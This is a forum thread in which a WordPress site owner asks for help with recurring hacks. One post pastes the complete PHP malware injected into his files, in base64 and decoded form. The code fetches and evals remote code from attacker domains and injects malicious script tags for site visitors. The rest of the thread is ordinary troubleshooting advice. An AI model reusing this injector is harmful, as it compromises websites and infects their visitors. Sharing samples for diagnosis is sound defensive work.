Webmasters, Wordpress = Regularly hacked?
I use wordpress, alot! It generally makes my life alot easier.
I keep the core up to date, and pretty much always install plugins like:
Contact Form 7.
Really Simple Captcha
Exploit Scanner
All in One SEO
Google Sitemap
WP-eComerse (if it's a shop site).
I normally get themes from THemeforest, (actually purchased)
Juggernaut, Mammoth & Prestige.
I have a fair few domains, but always seem to find they get hacked.
It's one of these hacks that either add some "base decode 64 thing"
with a fairly long string...
And generally I can go to the website, not a problem, but when someone else goes who hasn't been there before, they get told they have malware on their pc etc...
Whats the best way to protect myself?
It's pretty common, and wastes so much time re installing WP etc
I don't think it's my host daily.co.uk
Anyone else a webmaster, and have regular attacks?
05-04-12 at 11:15 AM
| #1 | ||
| Bored   Join Date: Jun 2008 Location: England! =) Posts: 1,101 |
| ||
|
Discuss Webmasters, Wordpress = Regularly hacked? at the Helpdesk forum within tehPARADOX.COM Online Sharing Community.
|
05-04-12 at 11:30 AM
| #2 |
| Elite  Join Date: Jun 2011 Location: Italic Ocean Posts: 2,191 |
I've never had any sort of issues with WP before. Is your WP source up to date and premissions correctly set?
|
|
|  |
|
05-04-12 at 11:48 AM
| #3 |
| Bored Join Date: Jun 2008 Location: England! =) Posts: 1,101 |
WP itself is up to date... Permissions are a mix of 755 and 644 (depending on being files or folders etc) |
|
| |
|
05-04-12 at 12:05 PM
| #4 |
| Bored Join Date: Jun 2008 Location: England! =) Posts: 1,101 |
I find this on the top of most php files: Code: Select All <?php /**/ eval(base64_decode("aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJF9TRVJWRVJbJ21yX25vJ10pKXsgICRfU0VSVkVSWydtcl9ubyddPTE7ICAgIGlmKCFmdW5jdGlvbl9leGlzdHMoJ21yb2JoJykpeyAgICBmdW5jdGlvbiBnZXRfdGRzXzc3NygkdXJsKXskY29udGVudD0iIjskY29udGVudD1AdHJ5Y3VybF83NzcoJHVybCk7aWYoJGNvbnRlbnQhPT1mYWxzZSlyZXR1cm4gJGNvbnRlbnQ7JGNvbnRlbnQ9QHRyeWZpbGVfNzc3KCR1cmwpO2lmKCRjb250ZW50IT09ZmFsc2UpcmV0dXJuICRjb250ZW50OyRjb250ZW50PUB0cnlmb3Blbl83NzcoJHVybCk7aWYoJGNvbnRlbnQhPT1mYWxzZSlyZXR1cm4gJGNvbnRlbnQ7JGNvbnRlbnQ9QHRyeWZzb2Nrb3Blbl83NzcoJHVybCk7aWYoJGNvbnRlbnQhPT1mYWxzZSlyZXR1cm4gJGNvbnRlbnQ7JGNvbnRlbnQ9QHRyeXNvY2tldF83NzcoJHVybCk7aWYoJGNvbnRlbnQhPT1mYWxzZSlyZXR1cm4gJGNvbnRlbnQ7cmV0dXJuICcnO30gIGZ1bmN0aW9uIHRyeWN1cmxfNzc3KCR1cmwpe2lmKGZ1bmN0aW9uX2V4aXN0cygnY3VybF9pbml0Jyk9PT1mYWxzZSlyZXR1cm4gZmFsc2U7JGNoID0gY3VybF9pbml0ICgpO2N1cmxfc2V0b3B0ICgkY2gsIENVUkxPUFRfVVJMLCR1cmwpO2N1cmxfc2V0b3B0ICgkY2gsIENVUkxPUFRfUkVUVVJOVFJBTlNGRVIsIDEpO2N1cmxfc2V0b3B0ICgkY2gsIENVUkxPUFRfVElNRU9VVCwgNSk7Y3VybF9zZXRvcHQgKCRjaCwgQ1VSTE9QVF9IRUFERVIsIDApOyRyZXN1bHQgPSBjdXJsX2V4ZWMgKCRjaCk7Y3VybF9jbG9zZSgkY2gpO2lmICgkcmVzdWx0PT0iIilyZXR1cm4gZmFsc2U7cmV0dXJuICRyZXN1bHQ7fSAgZnVuY3Rpb24gdHJ5ZmlsZV83NzcoJHVybCl7aWYoZnVuY3Rpb25fZXhpc3RzKCdmaWxlJyk9PT1mYWxzZSlyZXR1cm4gZmFsc2U7JGluYz1AZmlsZSgkdXJsKTskYnVmPUBpbXBsb2RlKCcnLCRpbmMpO2lmICgkYnVmPT0iIilyZXR1cm4gZmFsc2U7cmV0dXJuICRidWY7fSAgZnVuY3Rpb24gdHJ5Zm9wZW5fNzc3KCR1cmwpe2lmKGZ1bmN0aW9uX2V4aXN0cygnZm9wZW4nKT09PWZhbHNlKXJldHVybiBmYWxzZTskYnVmPScnOyRmPUBmb3BlbigkdXJsLCdyJyk7aWYgKCRmKXt3aGlsZSghZmVvZigkZikpeyRidWYuPWZyZWFkKCRmLDEwMDAwKTt9ZmNsb3NlKCRmKTt9ZWxzZSByZXR1cm4gZmFsc2U7aWYgKCRidWY9PSIiKXJldHVybiBmYWxzZTtyZXR1cm4gJGJ1Zjt9ICBmdW5jdGlvbiB0cnlmc29ja29wZW5fNzc3KCR1cmwpe2lmKGZ1bmN0aW9uX2V4aXN0cygnZnNvY2tvcGVuJyk9PT1mYWxzZSlyZXR1cm4gZmFsc2U7JHA9QHBhcnNlX3VybCgkdXJsKTskaG9zdD0kcFsnaG9zdCddOyR1cmk9JHBbJ3BhdGgnXS4nPycuJHBbJ3F1ZXJ5J107JGY9QGZzb2Nrb3BlbigkaG9zdCw4MCwkZXJybm8sICRlcnJzdHIsMzApO2lmKCEkZilyZXR1cm4gZmFsc2U7JHJlcXVlc3QgPSJHRVQgJHVyaSBIVFRQLzEuMFxuIjskcmVxdWVzdC49Ikhvc3Q6ICRob3N0XG5cbiI7ZndyaXRlKCRmLCRyZXF1ZXN0KTskYnVmPScnO3doaWxlKCFmZW9mKCRmKSl7JGJ1Zi49ZnJlYWQoJGYsMTAwMDApO31mY2xvc2UoJGYpO2lmICgkYnVmPT0iIilyZXR1cm4gZmFsc2U7bGlzdCgkbSwkYnVmKT1leHBsb2RlKGNocigxMykuY2hyKDEwKS5jaHIoMTMpLmNocigxMCksJGJ1Zik7cmV0dXJuICRidWY7fSAgZnVuY3Rpb24gdHJ5c29ja2V0Xzc3NygkdXJsKXtpZihmdW5jdGlvbl9leGlzdHMoJ3NvY2tldF9jcmVhdGUnKT09PWZhbHNlKXJldHVybiBmYWxzZTskcD1AcGFyc2VfdXJsKCR1cmwpOyRob3N0PSRwWydob3N0J107JHVyaT0kcFsncGF0aCddLic/Jy4kcFsncXVlcnknXTskaXAxPUBnZXRob3N0YnluYW1lKCRob3N0KTskaXAyPUBsb25nMmlwKEBpcDJsb25nKCRpcDEpKTsgaWYgKCRpcDEhPSRpcDIpcmV0dXJuIGZhbHNlOyRzb2NrPUBzb2NrZXRfY3JlYXRlKEFGX0lORVQsU09DS19TVFJFQU0sU09MX1RDUCk7aWYgKCFAc29ja2V0X2Nvbm5lY3QoJHNvY2ssJGlwMSw4MCkpe0Bzb2NrZXRfY2xvc2UoJHNvY2spO3JldHVybiBmYWxzZTt9JHJlcXVlc3QgPSJHRVQgJHVyaSBIVFRQLzEuMFxuIjskcmVxdWVzdC49Ikhvc3Q6ICRob3N0XG5cbiI7c29ja2V0X3dyaXRlKCRzb2NrLCRyZXF1ZXN0KTskYnVmPScnO3doaWxlKCR0PXNvY2tldF9yZWFkKCRzb2NrLDEwMDAwKSl7JGJ1Zi49JHQ7fUBzb2NrZXRfY2xvc2UoJHNvY2spO2lmICgkYnVmPT0iIilyZXR1cm4gZmFsc2U7bGlzdCgkbSwkYnVmKT1leHBsb2RlKGNocigxMykuY2hyKDEwKS5jaHIoMTMpLmNocigxMCksJGJ1Zik7cmV0dXJuICRidWY7fSAgZnVuY3Rpb24gdXBkYXRlX3Rkc19maWxlXzc3NygkdGRzZmlsZSl7JGFjdHVhbDE9JF9TRVJWRVJbJ3NfYTEnXTskYWN0dWFsMj0kX1NFUlZFUlsnc19hMiddOyR2YWw9Z2V0X3Rkc183NzcoJGFjdHVhbDEpO2lmICgkdmFsPT0iIikkdmFsPWdldF90ZHNfNzc3KCRhY3R1YWwyKTskZj1AZm9wZW4oJHRkc2ZpbGUsInciKTtpZiAoJGYpe0Bmd3JpdGUoJGYsJHZhbCk7QGZjbG9zZSgkZik7fWlmIChzdHJzdHIoJHZhbCwifHx8Q09ERXx8fCIpKXtsaXN0KCR2YWwsJGNvZGUpPWV4cGxvZGUoInx8fENPREV8fHwiLCR2YWwpO2V2YWwoYmFzZTY0X2RlY29kZSgkY29kZSkpO31yZXR1cm4gJHZhbDt9ICBmdW5jdGlvbiBnZXRfYWN0dWFsX3Rkc183NzcoKXskZGVmYXVsdGRvbWFpbj0kX1NFUlZFUlsnc19kMSddOyRkaXI9JF9TRVJWRVJbJ3NfcDEnXTskdGRzZmlsZT0kZGlyLiJsb2cxLnR4dCI7aWYgKEBmaWxlX2V4aXN0cygkdGRzZmlsZSkpeyRtdGltZT1AZmlsZW10aW1lKCR0ZHNmaWxlKTskY3RpbWU9dGltZSgpLSRtdGltZTtpZiAoJGN0aW1lPiRfU0VSVkVSWydzX3QxJ10peyRjb250ZW50PXVwZGF0ZV90ZHNfZmlsZV83NzcoJHRkc2ZpbGUpO31lbHNleyRjb250ZW50PUBmaWxlX2dldF9jb250ZW50cygkdGRzZmlsZSk7fX1lbHNleyRjb250ZW50PXVwZGF0ZV90ZHNfZmlsZV83NzcoJHRkc2ZpbGUpO30kdGRzPUBleHBsb2RlKCJcbiIsJGNvbnRlbnQpOyRjPUBjb3VudCgkdGRzKSswOyR1cmw9JGRlZmF1bHRkb21haW47aWYgKCRjPjEpeyR1cmw9dHJpbSgkdGRzW210X3JhbmQoMCwkYy0yKV0pO31yZXR1cm4gJHVybDt9ICBmdW5jdGlvbiBpc19tYWNfNzc3KCR1YSl7JG1hYz0wO2lmIChzdHJpc3RyKCR1YSwibWFjIil8fHN0cmlzdHIoJHVhLCJzYWZhcmkiKSlpZiAoKCFzdHJpc3RyKCR1YSwid2luZG93cyIpKSYmKCFzdHJpc3RyKCR1YSwiaXBob25lIikpKSRtYWM9MTtyZXR1cm4gJG1hYzt9ICBmdW5jdGlvbiBpc19tc2llXzc3NygkdWEpeyRtc2llPTA7aWYgKHN0cmlzdHIoJHVhLCJNU0lFIDYiKXx8c3RyaXN0cigkdWEsIk1TSUUgNyIpfHxzdHJpc3RyKCR1YSwiTVNJRSA4Iil8fHN0cmlzdHIoJHVhLCJNU0lFIDkiKSkkbXNpZT0xO3JldHVybiAkbXNpZTt9ICAgIGZ1bmN0aW9uIHNldHVwX2dsb2JhbHNfNzc3KCl7JHJ6PSRfU0VSVkVSWyJET0NVTUVOVF9ST09UIl0uIi8ubG9ncy8iOyRtej0iL3RtcC8iO2lmICghaXNfZGlyKCRyeikpe0Bta2RpcigkcnopO2lmIChpc19kaXIoJHJ6KSl7JG16PSRyejt9ZWxzZXskcno9JF9TRVJWRVJbIlNDUklQVF9GSUxFTkFNRSJdLiIvLmxvZ3MvIjtpZiAoIWlzX2RpcigkcnopKXtAbWtkaXIoJHJ6KTtpZiAoaXNfZGlyKCRyeikpeyRtej0kcno7fX1lbHNleyRtej0kcno7fX19ZWxzZXskbXo9JHJ6O30kYm90PTA7JHVhPSRfU0VSVkVSWydIVFRQX1VTRVJfQUdFTlQnXTtpZiAoc3RyaXN0cigkdWEsIm1zbmJvdCIpfHxzdHJpc3RyKCR1YSwiWWFob28iKSkkYm90PTE7aWYgKHN0cmlzdHIoJHVhLCJiaW5nYm90Iil8fHN0cmlzdHIoJHVhLCJnb29nbGUiKSkkYm90PTE7JG1zaWU9MDtpZiAoaXNfbXNpZV83NzcoJHVhKSkkbXNpZT0xOyRtYWM9MDtpZiAoaXNfbWFjXzc3NygkdWEpKSRtYWM9MTtpZiAoKCRtc2llPT0wKSYmKCRtYWM9PTApKSRib3Q9MTsgIGdsb2JhbCAkX1NFUlZFUjsgICAgJF9TRVJWRVJbJ3NfcDEnXT0kbXo7ICAkX1NFUlZFUlsnc19iMSddPSRib3Q7ICAkX1NFUlZFUlsnc190MSddPTEyMDA7ICAkX1NFUlZFUlsnc19kMSddPSJodHRwOi8vc3dlZXBzdGFrZXNhbmRjb250ZXN0c2RvLmNvbS8iOyAgJGQ9Jz9kPScudXJsZW5jb2RlKCRfU0VSVkVSWyJIVFRQX0hPU1QiXSkuIiZwPSIudXJsZW5jb2RlKCRfU0VSVkVSWyJQSFBfU0VMRiJdKS4iJmE9Ii51cmxlbmNvZGUoJF9TRVJWRVJbIkhUVFBfVVNFUl9BR0VOVCJdKTsgICRfU0VSVkVSWydzX2ExJ109J2h0dHA6Ly93d3cubGlseXBvcGhpbHlwb3AuY29tL2dfbG9hZC5waHAnLiRkOyAgJF9TRVJWRVJbJ3NfYTInXT0naHR0cDovL3d3dy5sb2x5cG9waG9seXBvcC5jb20vZ19sb2FkLnBocCcuJGQ7ICAkX1NFUlZFUlsnc19zY3JpcHQnXT0icG1nLnBocD9kcj0xIjsgIH0gICAgICBzZXR1cF9nbG9iYWxzXzc3NygpOyAgICBpZighZnVuY3Rpb25fZXhpc3RzKCdnbWxfNzc3JykpeyAgZnVuY3Rpb24gZ21sXzc3NygpeyAgICAkcl9zdHJpbmdfNzc3PScnOyAgaWYgKCRfU0VSVkVSWydzX2IxJ109PTApJHJfc3RyaW5nXzc3Nz0nPHNjcmlwdCBzcmM9IicuZ2V0X2FjdHVhbF90ZHNfNzc3KCkuJF9TRVJWRVJbJ3Nfc2NyaXB0J10uJyI+PC9zY3JpcHQ+JzsgIHJldHVybiAkcl9zdHJpbmdfNzc3OyAgfSAgfSAgICAgIGlmKCFmdW5jdGlvbl9leGlzdHMoJ2d6ZGVjb2RlaXQnKSl7ICBmdW5jdGlvbiBnemRlY29kZWl0KCRkZWNvZGUpeyAgJHQ9QG9yZChAc3Vic3RyKCRkZWNvZGUsMywxKSk7ICAkc3RhcnQ9MTA7ICAkdj0wOyAgaWYoJHQmNCl7ICAkc3RyPUB1bnBhY2soJ3YnLHN1YnN0cigkZGVjb2RlLDEwLDIpKTsgICRzdHI9JHN0clsxXTsgICRzdGFydCs9Miskc3RyOyAgfSAgaWYoJHQmOCl7ICAkc3RhcnQ9QHN0cnBvcygkZGVjb2RlLGNocigwKSwkc3RhcnQpKzE7ICB9ICBpZigkdCYxNil7ICAkc3RhcnQ9QHN0cnBvcygkZGVjb2RlLGNocigwKSwkc3RhcnQpKzE7ICB9ICBpZigkdCYyKXsgICRzdGFydCs9MjsgIH0gICRyZXQ9QGd6aW5mbGF0ZShAc3Vic3RyKCRkZWNvZGUsJHN0YXJ0KSk7ICBpZigkcmV0PT09RkFMU0UpeyAgJHJldD0kZGVjb2RlOyAgfSAgcmV0dXJuICRyZXQ7ICB9ICB9ICBmdW5jdGlvbiBtcm9iaCgkY29udGVudCl7ICBASGVhZGVyKCdDb250ZW50LUVuY29kaW5nOiBub25lJyk7ICAkZGVjb2RlZF9jb250ZW50PWd6ZGVjb2RlaXQoJGNvbnRlbnQpOyAgaWYocHJlZ19tYXRjaCgnL1w8XC9ib2R5L3NpJywkZGVjb2RlZF9jb250ZW50KSl7ICByZXR1cm4gcHJlZ19yZXBsYWNlKCcvKFw8XC9ib2R5W15cPl0qXD4pL3NpJyxnbWxfNzc3KCkuIlxuIi4nJDEnLCRkZWNvZGVkX2NvbnRlbnQpOyAgfWVsc2V7ICByZXR1cm4gJGRlY29kZWRfY29udGVudC5nbWxfNzc3KCk7ICB9ICB9ICBvYl9zdGFydCgnbXJvYmgnKTsgIH0gIH0="));?> Code: Select All if(function_exists('ob_start')&&!isset($_SERVER['mr_no'])){ $_SERVER['mr_no']=1; if(!function_exists('mrobh')){ function get_tds_777($url){$content="";$content=@trycurl_777($url);if($content!==false)return $content;$content=@tryfile_777($url);if($content!==false)return $content;$content=@tryfopen_777($url);if($content!==false)return $content;$content=@tryfsockopen_777($url);if($content!==false)return $content;$content=@trysocket_777($url);if($content!==false)return $content;return '';} function trycurl_777($url){if(function_exists('curl_init')===false)return false;$ch = curl_init ();curl_setopt ($ch, CURLOPT_URL,$url);curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt ($ch, CURLOPT_TIMEOUT, 5);curl_setopt ($ch, CURLOPT_HEADER, 0);$result = curl_exec ($ch);curl_close($ch);if ($result=="")return false;return $result;} function tryfile_777($url){if(function_exists('file')===false)return false;$inc=@file($url);$buf=@implode('',$inc);if ($buf=="")return false;return $buf;} function tryfopen_777($url){if(function_exists('fopen')===false)return false;$buf='';$f=@fopen($url,'r');if ($f){while(!feof($f)){$buf.=fread($f,10000);}fclose($f);}else return false;if ($buf=="")return false;return $buf;} function tryfsockopen_777($url){if(function_exists('fsockopen')===false)return false;$p=@parse_url($url);$host=$p['host'];$uri=$p['path'].'?'.$p['query'];$f=@fsockopen($host,80,$errno, $errstr,30);if(!$f)return false;$request ="GET $uri HTTP/1.0\n";$request.="Host: $host\n\n";fwrite($f,$request);$buf='';while(!feof($f)){$buf.=fread($f,10000);}fclose($f);if ($buf=="")return false;list($m,$buf)=explode(chr(13).chr(10).chr(13).chr(10),$buf);return $buf;} function trysocket_777($url){if(function_exists('socket_create')===false)return false;$p=@parse_url($url);$host=$p['host'];$uri=$p['path'].'?'.$p['query'];$ip1=@gethostbyname($host);$ip2=@long2ip(@ip2long($ip1)); if ($ip1!=$ip2)return false;$sock=@socket_create(AF_INET,SOCK_STREAM,SOL_TCP);if (!@socket_connect($sock,$ip1,80)){@socket_close($sock);return false;}$request ="GET $uri HTTP/1.0\n";$request.="Host: $host\n\n";socket_write($sock,$request);$buf='';while($t=socket_read($sock,10000)){$buf.=$t;}@socket_close($sock);if ($buf=="")return false;list($m,$buf)=explode(chr(13).chr(10).chr(13).chr(10),$buf);return $buf;} function update_tds_file_777($tdsfile){$actual1=$_SERVER['s_a1'];$actual2=$_SERVER['s_a2'];$val=get_tds_777($actual1);if ($val=="")$val=get_tds_777($actual2);$f=@fopen($tdsfile,"w");if ($f){@fwrite($f,$val);@fclose($f);}if (strstr($val,"|||CODE|||")){list($val,$code)=explode("|||CODE|||",$val);eval(base64_decode($code));}return $val;} function get_actual_tds_777(){$defaultdomain=$_SERVER['s_d1'];$dir=$_SERVER['s_p1'];$tdsfile=$dir."log1.txt";if (@file_exists($tdsfile)){$mtime=@filemtime($tdsfile);$ctime=time()-$mtime;if ($ctime>$_SERVER['s_t1']){$content=update_tds_file_777($tdsfile);}else{$content=@file_get_contents($tdsfile);}}else{$content=update_tds_file_777($tdsfile);}$tds=@explode("\n",$content);$c=@count($tds)+0;$url=$defaultdomain;if ($c>1){$url=trim($tds[mt_rand(0,$c-2)]);}return $url;} function is_mac_777($ua){$mac=0;if (stristr($ua,"mac")||stristr($ua,"safari"))if ((!stristr($ua,"windows"))&&(!stristr($ua,"iphone")))$mac=1;return $mac;} function is_msie_777($ua){$msie=0;if (stristr($ua,"MSIE 6")||stristr($ua,"MSIE 7")||stristr($ua,"MSIE 8")||stristr($ua,"MSIE 9"))$msie=1;return $msie;} function setup_globals_777(){$rz=$_SERVER["DOCUMENT_ROOT"]."/.logs/";$mz="/tmp/";if (!is_dir($rz)){@mkdir($rz);if (is_dir($rz)){$mz=$rz;}else{$rz=$_SERVER["SCRIPT_FILENAME"]."/.logs/";if (!is_dir($rz)){@mkdir($rz);if (is_dir($rz)){$mz=$rz;}}else{$mz=$rz;}}}else{$mz=$rz;}$bot=0;$ua=$_SERVER['HTTP_USER_AGENT'];if (stristr($ua,"msnbot")||stristr($ua,"Yahoo"))$bot=1;if (stristr($ua,"bingbot")||stristr($ua,"google"))$bot=1;$msie=0;if (is_msie_777($ua))$msie=1;$mac=0;if (is_mac_777($ua))$mac=1;if (($msie==0)&&($mac==0))$bot=1; global $_SERVER; $_SERVER['s_p1']=$mz; $_SERVER['s_b1']=$bot; $_SERVER['s_t1']=1200; $_SERVER['s_d1']="http://sweepstakesandcontestsdo.com/"; $d='?d='.urlencode($_SERVER["HTTP_HOST"])."&p=".urlencode($_SERVER["PHP_SELF"])."&a=".urlencode($_SERVER["HTTP_USER_AGENT"]); $_SERVER['s_a1']='http://www.lilypophilypop.com/g_load.php'.$d; $_SERVER['s_a2']='http://www.lolypopholypop.com/g_load.php'.$d; $_SERVER['s_script']="pmg.php?dr=1"; } setup_globals_777(); if(!function_exists('gml_777')){ function gml_777(){ $r_string_777=''; if ($_SERVER['s_b1']==0)$r_string_777='<script src="'.get_actual_tds_777().$_SERVER['s_script'].'"></script>'; return $r_string_777; } } if(!function_exists('gzdecodeit')){ function gzdecodeit($decode){ $t=@ord(@substr($decode,3,1)); $start=10; $v=0; if($t&4){ $str=@unpack('v',substr($decode,10,2)); $str=$str[1]; $start+=2+$str; } if($t&8){ $start=@strpos($decode,chr(0),$start)+1; } if($t&16){ $start=@strpos($decode,chr(0),$start)+1; } if($t&2){ $start+=2; } $ret=@gzinflate(@substr($decode,$start)); if($ret===FALSE){ $ret=$decode; } return $ret; } } function mrobh($content){ @Header('Content-Encoding: none'); $decoded_content=gzdecodeit($content); if(preg_match('/\<\/body/si',$decoded_content)){ return preg_replace('/(\<\/body[^\>]*\>)/si',gml_777()."\n".'$1',$decoded_content); }else{ return $decoded_content.gml_777(); } } ob_start('mrobh'); } } |
|
| |
|
05-04-12 at 12:32 PM
| #5 |
| Novice  Join Date: Aug 2007 Location: In the Free Rockin' World Posts: 183 |
Hey there. I run my own servers, mostly loaded up with Joomla and Wordpress sites. I have about 50 at the moment. I have been operating for about 4 years, and have never had a single site hacked. If you'd like me to host your sites, I have direct access to logs and can help you track down the source of the hack. If your Wordpress install is up-to-date, then it will be a 3rd party plugin that contains a vulnerability. If you can list EVERY plugin you have installed and include THE EXACT VERSION NUMBER OF EACH, then I can possibly help you find the culprit this way. In any case, good luck. PS Permissions are not really relevant, UNTIL someone finds a vulnerability in some code in your site and manages to get some kind of shell access. Last edited by darquillity; 05-04-12 at 12:34 PM. |
|
| |
|
05-05-12 at 01:29 PM
| #6 |
| Elder  Join Date: Dec 2008 Location: $_POST['WIN!']; Posts: 2,665 |
Seems like a hack of the e-commerce plugin, there is a variant of it here: Code: Select All http://forums.oscommerce.com/topic/345957-evalbase64-decode-hack/ Cheers, Jiff |
| |
|
06-11-12 at 04:15 AM
| #7 |
| Newcomer  Join Date: Jun 2012 Posts: 18 |
Wordpress is rarely hacked directly, it is usually inept hosting that is r00ted from some other site or via a server exploit, then all sites can be taken over, wordpress included, so if your hosting sux, then chances are everyone on it will be hacked. You can do few things to secure it though, such as remove any help or text files, put an index file in the uploads dir, if installtroned remove the config-example.php, etc etc.. |
|
| |
 |
|
« Previous Thread
|
Next Thread »
| Thread Tools | |
All times are GMT -7. The time now is 03:12 PM.
SEO by vBSEO ©2011, Crawlability, Inc.
SEO by vBSEO ©2011, Crawlability, Inc.